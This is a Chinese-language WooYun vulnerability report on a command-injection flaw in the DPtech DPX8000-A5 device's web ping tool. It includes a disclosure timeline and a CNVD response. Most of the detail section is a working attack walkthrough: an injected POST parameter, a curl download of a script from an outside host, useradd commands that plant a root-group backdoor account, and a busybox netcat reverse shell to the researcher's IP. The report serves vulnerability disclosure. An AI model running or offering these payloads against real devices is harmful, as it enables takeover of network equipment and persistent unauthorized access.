当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061235

漏洞标题:DPtech DPX8000-A5 命令执行漏洞导致设备可被控制

相关厂商:杭州迪普科技有限公司

漏洞作者: Tea

提交时间:2014-05-18 10:02

修复时间:2014-08-16 10:04

公开时间:2014-08-16 10:04

漏洞类型:设计不当

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-18: 细节已通知厂商并且等待厂商处理中
2014-05-23: 厂商已经确认,细节仅向厂商公开
2014-05-26: 细节向第三方安全合作伙伴开放
2014-07-17: 细节向核心白帽子及相关领域专家公开
2014-07-27: 细节向普通白帽子公开
2014-08-06: 细节向实习白帽子公开
2014-08-16: 细节向公众公开

简要描述:

通过弱口令找到的例子,当独拿出来讲一下拿交互式SHELL的方法。大牛略过。。。

详细说明:

命令执行方法POC:
http://10.X.X.73/func/web_main/display/net_tool/Ping
POST:
vrflist=0&ping_parameters=&ping_ip=0||ls -al ./

123.jpg


设备开启了telnet,用默认登录用户可登录,但是终端却是预定义命令的环境,虽然也可以执行很多的功能了,但是不得到控制整个设备的权限还是不爽啊!

5.jpg


查看设备信息:

QQ截图20140709191859.png


234.jpg


我开始的想法是写个WEBSHELL。。
但是后面尝试了很久,不支持常见脚本,看了配置文件以后,就放弃了(貌似cgi脚本)。
这条路死了。
很多命令都被删除了,wget,幸亏还有Curl还能用。。
写了个加用户的脚本丢上去,通过Curl去下载。
curl -o z.sh http://xxx/z.sh
加用户命令:

useradd -p \$1\$adminx\$j.GPEDH1kTqGmwJOvdVVt0 -o -u 0 -g root -G root -s /bin/sh -d /home/adminx adminx


其实后面知道了是不允许ROOT权限的用户直接远程登录的.(后面反弹shell看了下配置文件)
死活登录不上。。
后面:
所以加了个:

useradd -p \$1\$adminx\$j.GPEDH1kTqGmwJOvdVVt0 -o -u 1103 -g root -G root -s /bin/bash -d /home/adminx adminx


19.jpg


然后去登录,依然是预定义命令的终端,改/bin/sh还是没用.
然后这条路就也死了。
后面看了下环境。
无GCC,PYTHON,PERL。。。netcat也没得。。

123.jpg


现在情况(你不能修改或者删除设备上的配置文件什么的):
写SHELL太困难;
用现有帐号或者新增帐号telnet登录(预定义终端);
很多工具都被阉割掉了,或者根本就一直没得;
中间纠结了很久,也开了BT5然后找一些命令,尝试使用绝对路径去访问一些东西。。
还想写个shell脚本,安装一些环境,或者安装个netcat,反弹个SHELL回来。
当我在/bin下面看见了busybox的时候,突然感觉了一些希望,这玩意可以内置支持了不少工具。。
运行看了下:

123.jpg


发现里面支持nc.
支持nc的话,我们就很大可能可以反弹SHELL。。
执行看看。

123.jpg


支持"-e"参数,这样感觉就简单了,测试了几次,拿到下面的姿势:

/bin/busybox nc 10.10.10.10 2005 -e /bin/bash


10.10.10.10是我的IP,2005是我监听的端口号。
现在成功拿到了一个交互式的Shell(总算可以自己想干啥干啥)..

21.jpg

漏洞证明:

21.jpg


22.jpg


其实,主要就是一个姿势,在自己的BT5先测了可行:

/bin/busybox nc 10.10.10.10 2005 -e /bin/bash

修复方案:

检查,过滤。

版权声明:转载请注明来源 Tea@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-05-23 09:57

厂商回复:

CNVD未在实例上进行确认,已经先行将漏洞信息通报给杭州迪普科技有限公司安全响应中心。CNVD已经提取部分应用特征,待后续有条件(有认证条件)再进行通用性判定。目前根据设备固件特性进行认定。

最新状态:

暂无